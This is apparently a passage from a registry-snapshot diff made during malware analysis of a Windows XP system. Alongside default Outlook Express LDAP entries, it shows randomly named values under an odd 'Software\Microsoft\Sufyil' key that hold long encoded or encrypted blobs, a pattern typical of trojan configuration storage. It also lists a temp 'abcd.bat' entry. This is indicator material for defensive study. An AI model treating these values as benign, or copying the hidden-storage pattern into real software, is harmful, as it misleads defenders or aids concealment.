- HKU\S-1-5-21-1214440339-926492609-1644491937-1003\Software\Microsoft\Windows\ShellNoRoam\MUICache\C:\DOCUME~1\rik\LOCALS~1\Temp\abcd.bat: "abcd"
- HKU\S-1-5-21-1214440339-926492609-1644491937-1003\Software\Microsoft\Internet Account Manager\Accounts\WhoWhere\LDAP Server ID: 0x00000003
- HKU\S-1-5-21-1214440339-926492609-1644491937-1003\Software\Microsoft\Internet Account Manager\Accounts\WhoWhere\Account Name: "WhoWhere インターネット ディレクトリ サービス"
- HKU\S-1-5-21-1214440339-926492609-1644491937-1003\Software\Microsoft\Internet Account Manager\Accounts\WhoWhere\LDAP Server: "ldap.whowhere.com"
- HKU\S-1-5-21-1214440339-926492609-1644491937-1003\Software\Microsoft\Internet Account Manager\Accounts\WhoWhere\LDAP URL: "http://www.whowhere.com"
- HKU\S-1-5-21-1214440339-926492609-1644491937-1003\Software\Microsoft\Internet Account Manager\Accounts\WhoWhere\LDAP Search Return: 0x00000064
- HKU\S-1-5-21-1214440339-926492609-1644491937-1003\Software\Microsoft\Internet Account Manager\Accounts\WhoWhere\LDAP Timeout: 0x0000003C
- HKU\S-1-5-21-1214440339-926492609-1644491937-1003\Software\Microsoft\Internet Account Manager\Accounts\WhoWhere\LDAP Authentication: 0x00000000
- HKU\S-1-5-21-1214440339-926492609-1644491937-1003\Software\Microsoft\Internet Account Manager\Accounts\WhoWhere\LDAP Simple Search: 0x00000001
- HKU\S-1-5-21-1214440339-926492609-1644491937-1003\Software\Microsoft\Internet Account Manager\Accounts\WhoWhere\LDAP Logo: "%ProgramFiles%\Common Files\Services\whowhere.bmp"
- HKU\S-1-5-21-1214440339-926492609-1644491937-1003\Software\Microsoft\Internet Account Manager\Accounts\VeriSign\LDAP Server ID: 0x00000002
- HKU\S-1-5-21-1214440339-926492609-1644491937-1003\Software\Microsoft\Internet Account Manager\Accounts\VeriSign\Account Name: "VeriSign インターネット ディレクトリ サービス"
- HKU\S-1-5-21-1214440339-926492609-1644491937-1003\Software\Microsoft\Internet Account Manager\Accounts\VeriSign\LDAP Server: "directory.verisign.com"
- HKU\S-1-5-21-1214440339-926492609-1644491937-1003\Software\Microsoft\Internet Account Manager\Accounts\VeriSign\LDAP URL: "http://www.verisign.com"
- HKU\S-1-5-21-1214440339-926492609-1644491937-1003\Software\Microsoft\Internet Account Manager\Accounts\VeriSign\LDAP Search Return: 0x00000064
- HKU\S-1-5-21-1214440339-926492609-1644491937-1003\Software\Microsoft\Internet Account Manager\Accounts\VeriSign\LDAP Timeout: 0x0000003C
- HKU\S-1-5-21-1214440339-926492609-1644491937-1003\Software\Microsoft\Internet Account Manager\Accounts\VeriSign\LDAP Authentication: 0x00000000
- HKU\S-1-5-21-1214440339-926492609-1644491937-1003\Software\Microsoft\Internet Account Manager\Accounts\VeriSign\LDAP Search Base: "NULL"
- HKU\S-1-5-21-1214440339-926492609-1644491937-1003\Software\Microsoft\Internet Account Manager\Accounts\VeriSign\LDAP Simple Search: 0x00000001
- HKU\S-1-5-21-1214440339-926492609-1644491937-1003\Software\Microsoft\Internet Account Manager\Accounts\VeriSign\LDAP Logo: "%ProgramFiles%\Common Files\Services\verisign.bmp"
- HKU\S-1-5-21-1214440339-926492609-1644491937-1003\Software\Microsoft\Internet Account Manager\Accounts\Bigfoot\LDAP Server ID: 0x00000001
- HKU\S-1-5-21-1214440339-926492609-1644491937-1003\Software\Microsoft\Internet Account Manager\Accounts\Bigfoot\Account Name: "Bigfoot インターネット ディレクトリ サービス"
- HKU\S-1-5-21-1214440339-926492609-1644491937-1003\Software\Microsoft\Internet Account Manager\Accounts\Bigfoot\LDAP Server: "ldap.bigfoot.com"
- HKU\S-1-5-21-1214440339-926492609-1644491937-1003\Software\Microsoft\Internet Account Manager\Accounts\Bigfoot\LDAP URL: "http://www.bigfoot.com"
- HKU\S-1-5-21-1214440339-926492609-1644491937-1003\Software\Microsoft\Internet Account Manager\Accounts\Bigfoot\LDAP Search Return: 0x00000064
- HKU\S-1-5-21-1214440339-926492609-1644491937-1003\Software\Microsoft\Internet Account Manager\Accounts\Bigfoot\LDAP Timeout: 0x0000003C
- HKU\S-1-5-21-1214440339-926492609-1644491937-1003\Software\Microsoft\Internet Account Manager\Accounts\Bigfoot\LDAP Authentication: 0x00000000
- HKU\S-1-5-21-1214440339-926492609-1644491937-1003\Software\Microsoft\Internet Account Manager\Accounts\Bigfoot\LDAP Simple Search: 0x00000001
- HKU\S-1-5-21-1214440339-926492609-1644491937-1003\Software\Microsoft\Internet Account Manager\Accounts\Bigfoot\LDAP Logo: "%ProgramFiles%\Common Files\Services\bigfoot.bmp"
- HKU\S-1-5-21-1214440339-926492609-1644491937-1003\Software\Microsoft\Internet Account Manager\Accounts\Active Directory GC\LDAP Server ID: 0x00000000
- HKU\S-1-5-21-1214440339-926492609-1644491937-1003\Software\Microsoft\Internet Account Manager\Accounts\Active Directory GC\Account Name: "Active Directory"
- HKU\S-1-5-21-1214440339-926492609-1644491937-1003\Software\Microsoft\Internet Account Manager\Accounts\Active Directory GC\LDAP Server: "NULL"
- HKU\S-1-5-21-1214440339-926492609-1644491937-1003\Software\Microsoft\Internet Account Manager\Accounts\Active Directory GC\LDAP Search Return: 0x00000064
- HKU\S-1-5-21-1214440339-926492609-1644491937-1003\Software\Microsoft\Internet Account Manager\Accounts\Active Directory GC\LDAP Timeout: 0x0000003C
- HKU\S-1-5-21-1214440339-926492609-1644491937-1003\Software\Microsoft\Internet Account Manager\Accounts\Active Directory GC\LDAP Authentication: 0x00000002
- HKU\S-1-5-21-1214440339-926492609-1644491937-1003\Software\Microsoft\Internet Account Manager\Accounts\Active Directory GC\LDAP Simple Search: 0x00000000
- HKU\S-1-5-21-1214440339-926492609-1644491937-1003\Software\Microsoft\Internet Account Manager\Accounts\Active Directory GC\LDAP Bind DN: 0x00000000
- HKU\S-1-5-21-1214440339-926492609-1644491937-1003\Software\Microsoft\Internet Account Manager\Accounts\Active Directory GC\LDAP Port: 0x00000CC4
- HKU\S-1-5-21-1214440339-926492609-1644491937-1003\Software\Microsoft\Internet Account Manager\Accounts\Active Directory GC\LDAP Resolve Flag: 0x00000001
- HKU\S-1-5-21-1214440339-926492609-1644491937-1003\Software\Microsoft\Internet Account Manager\Accounts\Active Directory GC\LDAP Secure Connection: 0x00000000
- HKU\S-1-5-21-1214440339-926492609-1644491937-1003\Software\Microsoft\Internet Account Manager\Accounts\Active Directory GC\LDAP User Name: "NULL"
- HKU\S-1-5-21-1214440339-926492609-1644491937-1003\Software\Microsoft\Internet Account Manager\Accounts\Active Directory GC\LDAP Search Base: "NULL"
- HKU\S-1-5-21-1214440339-926492609-1644491937-1003\Software\Microsoft\Internet Account Manager\Accounts\PreConfigVer: 0x00000004
- HKU\S-1-5-21-1214440339-926492609-1644491937-1003\Software\Microsoft\Internet Account Manager\Accounts\PreConfigVerNTDS: 0x00000001
- HKU\S-1-5-21-1214440339-926492609-1644491937-1003\Software\Microsoft\Internet Account Manager\Server ID: 0x00000004
- HKU\S-1-5-21-1214440339-926492609-1644491937-1003\Software\Microsoft\Internet Account Manager\Default LDAP Account: "Active Directory GC"
- HKU\S-1-5-21-1214440339-926492609-1644491937-1003\Software\Microsoft\Sufyil\16c6jhji: 10 38 3A 8C EC 37 4D 37 6B 85 7C 00 79 57
- HKU\S-1-5-21-1214440339-926492609-1644491937-1003\Software\Microsoft\Sufyil\1b52cjj4: 0x8C5B382D
- HKU\S-1-5-21-1214440339-926492609-1644491937-1003\Software\Microsoft\Sufyil\2b4gb2j8: 61 31 68 62 6A 44 34 4F 4B 54 63 65 68 55 30 41
- HKU\S-1-5-21-1214440339-926492609-1644491937-1003\Software\Microsoft\Sufyil\12jcjhb1: 7C 38 5B 8C F9 07 57 67 98 DF 13 61 02 BC EB 08 51 5E CB CC 76 AA D7 50 FE 83 D2 B6 EA 82 D3 DB 63 B8 8B 43 DC E2 C2 CB CC B6 70 ED 1C 61 08 D8 6A 7E A0 5D 57 FA DE C5 AF D7 91 F1 D2 AD 6B 2F A7 88 0B 28 97 70 54 63 34 38 6B 93 6F 61 8C 84 3F E7 95 23 5A BC 49 F9 A2 C1 C4 61 D9 31 F2 C9 2E E6 EF 1E 65 73 2A C2 5F 1A 9E C4 0D 99 CC AF 6D EE C4 77 65 CC 74 A5 BE 18 C3 1E 66 EA 09 47 A0 C2 80 26 69 BA A4 D3 8F C8 18 DB A9 00 60 95 2D E7 C0 3B 7B 15 EC 06 01 62 0B BA 53 B7 F4 72 5A 61 3B 87 4F B4 84 5F B5 FF EB 7D A3 BF 6C 82 18 17 8A 58 A5 CC F6 0E 1E 8E 6C 10 3C 48 48 C7 DB AB 86 68 7A 58 22 A1 E1 BB 7B B5 10 D5 FB F8 37 90 90 A8 A6 C8 8A B0 90 0C 2C A5 9B BD 0B BE E2 2A 44 E3 10 07 C7 60 4E 16 C8 3A D8 08 C7 B8 C3 5A 5E 26 B3 D9 4B 93 8C 67 2B 32 DF F8 5D 42 BB 56 79 28 74 3D DD 9A 94 A4 D7 94 B0 D9 54 C7 F5 25 4C A7 DD 56 4D 9A 34 54 1E EE 04 A0 5D 6B F0 9A 85 67 C4 14 1B D1 F9 CB 97 B3 7D AD 83 0D 7A 26 3D DE 56 21 73 A3 F1 E3 AA 93 5D B2 3B BF 51 7C 98 EF AD 1B D6 0B 9D 36 22 F9 9E F8 8E 59 2F DD F2 F5 85 20 19 7C A5 40 E0 4B 21 A2 70 B5 6B C8 B0 B9 1C 47 3D DC 21 69 90 07 5B 9F AF 86 CA 75 6C 47 7C A5 D3 AF D5 4C 93 D0 A6 F5 F6 EB 2F D9 99 13 DD 6C 66 66 AE 7C 10 F8 D2 C1 66 E7 D5 75 3D 4D 2E 91 77 B4 20 A0 DA A2 A7 54 6C 22 B2 05 14 65 E2 74 36 1F 0D BA 3E DF 0D B9 71 A3 FE 2C 7D B3 A1 2C 17 4D 95 EC A4 99 DA C8 13 DE EE DA FE 75 E8 84 92 D1 22 4D 0B 88 66 67 C6 E1 1C 39 F1 26 0C 12 07 61 68 A0 87 6B BE 9A 4C 9D BB 82 F6 97 AB 39 AD 37 0D A6 1A 4A B0 9A 05 B1 6C 7A FD D5 1A 75 5A A4 F8 97 D6 82 93 5C 5D F2 D3 AC 84 7F 61 A1 7C 84 C5 67 7E 84 D9 57 02 F2 53 32 DA 75 4C 31 EB 76 A5 D3 27 18 58 60 8E 56 7E 71 C6 58 4E B0 34 AF 15 C6 B2 06 3E D8 63 D8 FB 65 65 47 BC 31 97 EC BC CD 20 BF DB 20 49 7A AD 58 E8 7C 77 C0 56 4C 79 B6 1D F3 13 09 91 B8 D0 30 3F 3B B0 81 D1 5C 1C 96 D4 A4 A9 9F 43 DC 0B C5 1A 08 37 96 66 78 62 33 CA 89 C9 4D 1D 55 50 CD 6E B0 38 51 EE F3 9E A9 7C 7A 22 1E C9 55 AE 5C 77 86 5B 93 F6 57 41 F9 14 5E A4 E4 B5 87 0C FD 52 99 AF 06 3B 35 4F 3F 52 ED B6 5A E3 48 C2 A7 5B 63 A6 21 33 3D 32 D4 8F 2F D2 24 3E 74 79 1E D9 E0 60 40 59 26 99 21 0E FD 55 69 82 D3 0E 93 52 33 0A A5 F0 8E BD 17 29 B9 8D C8 E1 A6 63 CB D3 64 AC 61 42 50 A6 CB CC 88 C7 67 C0 C0 D6 41 98 47 00 BF CD 93 29 ED 67 3F F1 B2 4F 0E EA 8E A6 84 C2 5F B5 2E DC 36 C4 8A FF 81 E3 60 C3 96 A2 7B 6C 98 69 3B DD E2 46 73 2F 3C F5 8A 2F 32 D2 63 24 3E 6F F0 7A D3 2F B3 22 1F 65 88 50 78 A1 C9 B0 46 B6 E2 20 46 87 0F 3B A3 DD 0A AA 6B C9 ED EE 71 B5 E7 F6 21 E8 F2 5C 8F FC C4 9A AB 8D 25 A5 C3 00 75 B5 BC FC 19 0E F0 29 BE A5 D0 DE 87 D1 09 24 A6 04 ED 1E 29 17 00 19 14 3C 2F F6 B3 FF 71 FE 1B 76 90 07 44 C2 8A EA F5 31 60 D4 A8 86 E2 95 C4 C3 EA 06 DA 5C C2 42 50 EA 4A 03 0D E8 D9 42 2A 26 C7 40 D7 F5 A0 CC 24 BE E2 64 16 80 71 D8 27 41 6A 30 6D EE 7E 8C DC A2 7A 05 A0 94 E1 EE 83 BE 0A 23 DB 81 FA 0C E8 F8 0A 30 34 19 15 06 D7 79 77 72 A8 0A CD 24 93 74 94 0F 74 A2 0F 5A C9 C7 00 8C 51 FD ED E8 FC 49 89 BC 6B 0D B8 0F 5D CE 9E BB FA 63 FE 36 29 E5 4F 1D 31 6D 85 67 44 02 06 CB FC 1D A5 AC 15 AB BC 86 6B A3 54 99 A2 27 3D 29 42 99 71 DC 3B 06 5F 64 32 1F 1C 24 BD AD 7A 0C 80 C9 7C AE 19 29 08 45 05 C8 35 6D CA AC B1 BC 02 94 38 D7 FD 95 F3 11 0B 78 63 BA F4 89 39 56 4D 47 23 C4 44 1A 7A C7 54 75 8E 0F 5F 61 4A 86 65 17 8C B4 6D 18 5B D3 19 5F CF E1 2A FE 27 DD 98 13 94 9F CD C4 9B 7B AA FB 43 48 1C F2 BD 05 C2 BB EF F1 40 9F 61 4E D9 E7 D8 AF DF CE F7 03 B7 BC DD 24 CD 30 92 9F EE 3A 36 37 2D F5 54 EC DA CC 2D 21 1E 9C 00 64 A9 A0 F6 6C 10 78 A6 0C 63 E3 48 41 49 82 B8 6B 91 B9 7A 3C 80
- HKU\S-1-5-21-1214440339-926492609-1644491937-1003\Software\Microsoft\Sufyil\7ec4g79: 66 44 68 62 6A 49 49 33 4B 54 63 66 74 55 77 41 54 6C 66 46 4F 52 36 52 73 37 6A 58 6C 63 66 5A 45 39 4E 33 56 58 6E 39 6C 7A 77 69 6E 6F 5A 47 79 4D 6A 35 49 62 2B 32 63 4F 30 63 59 51 6A 59 61 6E 36 67 58 56 66 36 33 73 57 76 31 35 48 71 52 34 48 6D 6F 5A 65 75 79 41 2F 53 36 6A 61 4A 4E 63 39 34 44 38 76 53 59 4D 36 73 59 37 52 6C 65 71 74 61 46 54 4B 31 78 6A 71 65 50 55 35 66 54 48 5A 59 70 4F 63 4B 67 79 74 55 6E 43 4E 78 49 76 61 75 4C 51 43 78 6F 37 77 37 69 4F 4D 67 51 2B 55 63 44 41 5A 51 54 73 4D 51 6D 5A 35 6E 64 61 5A 6F 4F 79 7A 7A 77 6A 67 2B 48 71 32 58 58 34 46 42 55 50 63 54 33 62 33 34 68 30 77 39 4C 72 52 32 6D 79 4E 4B 4F 4E 66 36 7A 71 51 69 58 6B 52 73 4F 38 6A 4C 43 4F 43 4D 56 41 48 44 32 49 54 51 36 37 67 6F 4E 62 6B 65 6A 65 67 59 55 57 6B 76 6A 51 41 5A 67 56 6B 7A 32 68 77 67 4D 4F 63 32 6B 55 52 55 77 6F 74 66 57 49 55 7A 37 2B 2B 75 6F 4F 49 69 51 68 62 63 6C 34 42 31 70 44 63 4D 6B 48 34 57 49 7A 56 6F 37 48 71 69 49 74 46 57 45 59 61 31 58 66 39 43 47 33 39 55 31 71 4A 37 2F 64 74 52 6D 41 2B 66 4F 4A 34 4D 6B 54 72 53 45 6E 62 2F 6E 79 38 75 47 71 42 2F 55 61 75 4F 68 51 33 75 79 77 6F 59 76 38 54 51 76 34 34 67 35 64 53 51 59 34 34 53 47 65 44 4C 4F 32 75 78 75 6D 34 43 55 49 48 46 4A 5A 34 45 71 57 4D 4F 6B 31 32 79 4F 37 39 52 66 4A 6A 76 72 52 76 57 43 35 30 32 49 76 6D 65 2B 49 35 5A 4C 39 33 79 39 51 41 51 5A 79 77 68 4C 50 34 50 6F 64 66 59 68 6F 2B 30 57 68 6D 47 30 37 38 65 62 75 72 52 71 78 43 50 46 31 33 6B 48 47 78 48 66 4B 58 54 72 39 56 4D 6B 39 43 6D 39 66 62 72 4C 39 6D 5A 45 39 31 73 5A 6D 61 75 66 42 44 34 56 2F 45 59 74 31 4E 35 4D 50 74 35 50 62 46 44 56 6D 72 55 58 4D 51 33 68 33 56 75 32 43 59 61 67 4E 66 58 57 52 62 33 50 74 38 4E 75 58 47 6A 2F 69 78 39 73 36 45 73 46 30 32 56 37 4B 53 5A 32 73 67 54 33 75 37 61 2F 6E 56 75 74 4F 79 42 6F 46 39 56 45 69 70 76 6E 39 6F 7A 70 54 67 34 48 76 36 58 46 53 69 77 77 44 6E 79 4B 35 73 6B 4C 65 48 32 6C 70 73 34 72 54 63 4E 70 70 70 76 61 6E 67 7A 70 66 31 66 5A 37 4A 33 72 57 62 4B 56 42 69 67 79 6C 50 34 66 31 75 74 33 4C 64 6A 41 58 49 47 61 72 46 46 56 70 2B 31 46 70 5A 51 2B 67 30 62 45 53 7A 48 2B 52 69 63 65 4A 62 46 72 75 52 43 62 4B 46 32 58 41 79 37 77 4F 34 38 53 73 68 69 48 65 50 4F 4F 75 33 59 64 4D 6E 38 58 32 2F 65 75 72 72 48 68 52 61 4B 4F 31 34 72 75 2B 69 2F 6B 59 45 48 62 65 4F 35 30 58 4F 4E 66 77 6E 53 49 4C 31 66 4D 77 2F 65 55 35 47 2B 59 2B 49 5A 55 62 64 33 62 65 55 39 48 53 6D 66 72 4D 6E 38 65 4C 37 38 77 64 43 63 43 66 5A 45 74 67 53 36 59 67 67 65 58 2F 63 74 5A 5A 45 78 33 68 6D 5A 34 34 5A 4B 6C 71 44 7A 4B 4E 37 77 76 31 6C 36 4B 6F 32 74 66 42 42 30 41 42 66 77 2F 57 58 63 78 35 74 72 46 48 47 5A 63 6E 4D 59 6E 42 6C 52 6D 48 43 75 71 6C 57 31 70 6E 67 41 53 6F 4B 59 73 69 6E 69 59 51 31 6B 46 4D 34 7A 43 54 57 62 50 31 30 7A 41 52 5A 51 54 42 38 67 68 79 6A 33 45 38 69 61 4B 71 44 42 55 70 62 43 72 44 58 39 66 46 6A 6B 58 68 38 77 65 6B 4D 47 42 72 37 63 77 66 54 55 50 71 64 67 79 34 34 31 4B 4A 48 4F 73 65 71 61 61 5A 59 4A 6D 50 6D 38 2B 43 71 73 6E 55 66 67 72 6F 78 6A 79 6D 50 4B 67 65 77 64 76 43 6B 34 68 45 42 45 51 4F 4A 69 71 53 69 48 44 4A 57 61 62 75 4B 34 42 52 47 67 39 4C 47 39 5A 51 46 44 4F 45 47 49 50 51 5A 51 79 6D 6A 61 76 30 42 77 7A 79 75 42 39 6C 42 4B 77 44 44 4A 37 65 35 78 74 65 66 32 49 65 6A 79 58 49 2F 38 78 4A 71 72 6A 53 57 6C 77 77 42 31 74 62 7A 38 47 59 54 41 56 2B 34 6B 75 6E 59 70 76 44 65 6B 75 58 2B 2B 57 76 67 42 53 47 4B 43 70 72 6D 76 67 72 48 4E 31 57 78 73 6F 51 64 45 77 6F 72 71 39 54 46 67 31 4B 69 47 34 70 58 45 77 2B 6F 47 32 6C 7A 43 51 6C 44 71 53 67 4D 4E 59 2B 6B 38 65 71 59 49 76 47 44 32 55 51 2F 64 49 4D 45 34 57 75 49 6D 64 44 55 6F 74 6E 66 70 4C 64 66 78 4F 47 77 4F 42 61 43 55 34 65 36 44 76 67 6F 6A 32 34 48 36 44 4F 6A 34 43 6A 41 30 47 52 55 47 31 33 6C 33 63 71 69 42 2F 56 76 7A 38 6B 78 64 4C 6B 51 6B 57 33 69 44 66 72 70 51 46 4B 35 67 56 45 33 31 67 4C 4C 35 56 34 43 4B 62 37 31 57 47 31 77 5A 43 69 6E 6C 54 78 30 78 62 59 56 6E 52 41 49 47 79 2F 77 64 70 61 77 56 71 2F 31 38 66 46 44 49 64 4D 77 6F 56 55 56 6E 56 65 69 4D 70 76 48 4D 59 7A 6C 48 44 55 68 73 4C 78 63 38 55 53 75 55 64 30 2F 52 51 35 43 30 30 48 66 39 39 4D 66 43 4D 4F 50 6B 64 37 4E 37 78 5A 62 6E 41 43 58 70 79 7A 4F 52 41 4D 7A 65 30 76 55 6B 52 56 78 4F 65 31 49 79 6C 79 42 6E 74 6F 4A 5A 34 53 59 32 51 77 36 30 4B 38 30 46 77 37 68 31 30 42 59 65 4E 4A 45 64 7A 2B 4B 30 34 79 59 36 77 6E 36 6B 54 77 77 55 67 5A 45 2F 71 41 51 49 4B 4C 45 4F 31 45 71 74 54 74 64 42 58 58 77 72 4D 79 2F 75 64 75 59 63 30 6E 68 66 62 42 63 64 2B 36 6F 6D 41 30 76 33 79 76 4E 68 54 45 6E 4E 77 32 73 70 77 52 2B 59 4F 34 76 48 48 54 66 5A 54 63 50 33 59 6B 33 42 73 2B 57 76 77 67 37 4F 54 63 4C 62 6C 68 6F 47 38 46 53 75 4E 36 75 77 54 56 41 33 63 35 4C 6E 4E 48 66 55 31 4E 4D 44 39 59 4F 74 76 79 6C 39 59 6F 33 72 4F 69 4B 55 44 49 2B 35 43 2B 61 70 30 69 4D 73 37 56 59 50 76 52 2B 54 50 30 2B 55 5A 77 74 70 33 6E 5A 76 38 6F 50 47 62 42 52 45 45 39 4C 7A 6F 57 56 5A 44 7A 42 71 63 6C 7A 31 37 65 48 66 54 4B 50 46 71 53 57 59 35 54 42 33 32 72 2B 2B 2B 34 65 4B 79 30 6A 66 6D 68 44 6C 64 4F 2F 38 56 48 46 6E 6F 34 77 78 33 2F 4D 2F 4D 79 37 33 64 6F 2B 2F 55 71 79 2F 4C 4A 5A 75 62 75 4A 44 62 36 36 62 72 51 32 53 43 4E 50 52 62 4F 67 39 6B 37 6A 61 67 56 49 78 57 58 31 31 75 53 48 58 6F 51 61 6A 63 75 4B 48 58 33 69 74 2F 77 5A 33 6B 4E 50 36 6C 4A 38 78 67 30 62 76 6F 50 59 32 33 39 41 54 63 57 37 49 53 64 4F 45 4C 2B 4D 49 41 6B 44 63 61 49 76 4E 50 45 4C 45 42 72 77 37 72 4C 79 57 4D 4F 41 73 4F 44 30 2B 72 4F 73 6E 6B 30 54 4A 30 6E 59 50 41 4D 45 69 31 57 47 52 33 4F 4A 35 56 55 51 30 73 51 73 48 62 38 4A 69 31 76 66 6F 34 31 34 44 66 63 4B 65 6E 6D 66 68 76 33 73 79 7A 76 2B 57 59 2B 2F 70 6D 37 52 49 49 71 72 47 65 4A 43 42 67 45 4F 6B 32 31 38 4E 2B 76 37 63 45 4E 71 53 56 2F 4B 4C 52 35 66 33 37 56 51 4E 49 61 34 57 49 6D 35 33 2F 6C 59 42 78 71 6D 70 35 76 31 74 46 32 78 30 78 6D 53 46 47 45 33 52 31 77 4A 47 35 36 7A 64 32 41 4B 35 37 68 39 38 65 4C 39 36 33 72 79 4E 6B 52 4B 68 4E 61 30 6B 55 7A 4E 30 45 75 67 41 2B 56 43 55 52 74 2F 6E 4B 36 45 2F 62 51 70 45 2B 4F 6E 66 4D 37 61 2F 47 66 4F 2F 76 65 51 51 4B 78 61 46 30 62 73 69 77 7A 47 6F 78 4B 38 53 50 2F 43 54 56 2F 55 52 61 37 58 2F 42 49 63 43 43 6B 6D 5A 41 6B 4A 38 65 35 50 62 2B 54 55 72 4B 79 68 42 47 56 33 4B 6A 44 41 62 54 42 42 59 63 68 4C 6B 6F 78 30 48 2F 4C 65 38 58 59 34 77 39 73 63 35 68 47 68 67 78 6D 4A 55 74 69 6C 50 57 6D 45 58 74 59 62 57 44 74 42 2B 4B 36 74 45 45 62 35 58 52 30 33 51 38 4E 46 32 50 39 51 52 4E 75 6A 57 44 6F 77 46 43 38 56 2B 57 50 4A 32 68 64 44 57 63 50 58 48 6B 4E 56 4D 6F 78 2F 6E 54 65 41 64 58 44 34 78 45 53 76 55 57 2B 67 59 51 45 4A 77 38 38 42 56 39 55 33 55 71 6F 58 50 41 46 34 37 4A 6D 6E 63 6B 38 49 65 79 64 6D 65 51 31 48 6C 70 75 45 2F 6C 4D 37 2B 41 44 31 36 78 4D 69 59 46 53 61 48 62 67 4B 5A 48 71 6A 32 67 4A 53 2B 77 67 38 62 4C 56 2B 78 6F 4C 4F 6E 59 38 54 41 41 6C 79 50 6A 4C 7A 77 50 6E 69 67 6B 50 39 75 6B 59 4C 52 43 79 6F 2F 51 45 2F 57 78 31 30 79 47 69 2B 63 52 45 47 49 78 48 73 38 33 57 7A 77 67 76 42 56 68 45 54 43 66 59 61 4A 30 33 45 63 51 73 52 72 67 6F 43 76 47 75 39 51 49 55 57 43 52 59 35 31 6B 6B 6E 65 6F 39 31 5A 45 77 70 4D 36 64 4F 48 50 4C 45 76 54 2F 4A 70 4F 74 68 65 30 62 73 35 47 4D 74 36 49 6D 44 4C 77 31 79 54 75 47 59 53 32 50 64 70 55 4B 61 47 39 55 73 64 68 58 4E 2F 2F 6E 75 49 35 79 6E 73 62 48 4E 4F 50 42 32 7A 41 68 77 6C 36 32 51 51 2F 72 67 49 54 6E 69 74 65 2F 71 63 79 37 6E 34 58 51 46 62 6B 6B 6A 54 7A 66 59 36 52 2B 71 6E 69 49 31 34 66 55 4B 4A 61 77 3D 3D
- HKU\S-1-5-21-1214440339-926492609-1644491937-1003\Software\Microsoft\Sufyil\1ccc3cfg: 9A A2 3F 43 D5 D4 29 01 0A 77 93 11 1E BD CB F6 47 7D 44 34 F9 57 05 D6 50 A6 04 20 31 A0 C6 83 8F 80 3D 1A 68 60 03 5F 84 3D AC 6C B2 88 18 88 99 2B A0 5D 56 FA DE D5 60 D6 91 F1 63 99 15 7F 5C F2 20 71 D5 02 D6 6E AC 91 73 DC 53 DB 47 F4 B3 CF 90 56 06 13 98 0B 1E BC DF CA 0F B7 06 3A 13 57 8F 81 02 CF D2 65 9B 8D 0E 73 99 06 7A E8 56 FE 55 72 6A F0 3A 4F 71 88 7C AB 6C E6 FF 91 4B 67 52 B1 56 6D AF 13 17 A5 54 4C F6 AB 35 D5 35 F3 91 78 F4 BC 49 8D 2D C0 11 7A 6D D0 DE DF E7 BF 97 6C D7 49 D9 C6 A8 BB BD 34 89 67 09 9E CD 25 1E 58 3F 6B 5B AD 80 F5 01 37 E4 A5 43 59 5A 2A 24 4F 0D BC 9B 5B 82 2F 55 DD AF 89 B1 B4 08 46 53 D3 F7 61 FC 46 9D D0 94 81 C7 EA 48 22 D9 C2 B8 B1 E6 97 E3 89 24 D0 5E CB F6 8F 43 C1 31 24 6D A0 90 59 DF FB 70 F3 A1 5C 78 73 B9 00 93 5B A0 87 1F 34 3F 13 A6 71 8A DF 32 3A D5 D0 28 92 83 34 2D FE B6 FD AD 62 81 C6 E6 DE B8 FE A6 ED BC 9C AB AA 27 57 90 60 14 A9 5E 56 32 82 43 2B 15 7A 80 3F 25 C8 DF 42 83 EF 35 03 7D 93 FA DC CD B7 A7 AF 0E A3 F3 1B 40 DA 3F 3F 73 F3 92 F6 F4 0C 13 94 47 BB 82 08 D7 D2 BD 81 4F 09 AF 1E 67 61 3A 06 1E B8 C0 22 8E 4B 07 08 C3 D0 99 A3 9A A0 15 BE 12 49 BC 8A 2A DB 37 A2 DA BE 17 34 9D 14 70 CD 91 22 3D 72 4B 04 3C B6 FC 5D D3 B0 D0 CD 52 A8 1C F6 EC E0 F3 E5 3C D2 08 06 BA 67 D3 0F 76 6A BB DF 55 77 AC 0C A5 B1 12 7E AC EA C1 4F 91 A4 D8 D8 33 6C EE C6 6D 8B 42 25 F2 8C 81 29 44 B5 8E D8 C5 53 E1 09 74 77 06 E8 91 25 34 B5 43 ED A3 2D 76 1E 02 A8 39 F3 1F 8C AB F2 B3 EA B1 6F 6B 21 83 DC 58 9E F5 75 D2 2B 91 DA 48 5C 36 B6 B0 43 6A 4B A7 5B EA E5 D3 2D 54 AF 2F 45 48 44 C7 34 0D FE FA 51 F3 46 F6 A4 AF 0D 1B 11 2C C7 CD EB 8D EC 27 2F 58 60 8E CA DD 7A 97 DF A3 E0 3A 71 EC DC F1 93 87 CC 2B 42 4B 37 37 D6 9E 08 A1 2B 8B E5 56 67 93 69 2B 20 6C 4A 81 8E 04 04 CC 9B BF C7 ED DF 8B 33 A9 0C 8E 21 75 A1 67 FE D0 5C 1C 96 D5 A4 A9 DF D2 DC 0B C5 AF 08 37 96 6C 89 DF 72 AB 7E EC 51 10 9D 21 4B 0D 4D 16 C5 21 0A B0 00 2F 23 3D 49 76 47 3B 62 22 47 B9 68 46 5C 8F 1E 8F 94 BB D5 73 31 F8 B7 70 94 56 BC 15 38 B0 45 3A BE 48 10 F5 11 DF 4C 9A ED 39 F0 56 31 47 88 91 6C CA 10 D7 6B DF 8D F6 3D 7C 26 B2 27 67 DB 3D 97 4F D1 68 CC EF A0 C7 4D B0 A1 67 3D 22 72 BD 3B 22 FB 13 E2 F5 F9 01 73 23 1E 03 17 1B 42 A5 6F C2 C4 12 14 C6 7C FF C8 76 FC E3 A8 C0 F0 AA AB 69 39 8D 3B 93 6B 1F 03 83 46 68 5B 05 5F C4 8B FF 81 A3 BF C3 96 A2 3E 6D 98 69 B4 04 FC 2D 72 88 F3 49 8D D0 06 71 95 95 46 55 8D 97 FA 80 C3 10 56 2D 54 0F
- ----------------------------------
- Values modified:23
- ----------------------------------
- HKLM\SOFTWARE\Microsoft\Cryptography\RNG\Seed: 90 30 12 62 DD 7F 82 8B 16 05 C8 00 DB B4 6A A5 46 4D 70 E1 BF D3 DF C0 7F 53 19 88 0A 81 8E 16 41 0C 73 6B 8C 8D 74 B2 A2 94 6D 55 8D DC 9D 40 85 6C B0 1F B7 5F A2 35 77 97 7A D6 D7 26 EE 09 C9 06 26 2A 26 AA B5 59 51 09 CF 32 62 5B 0F 61
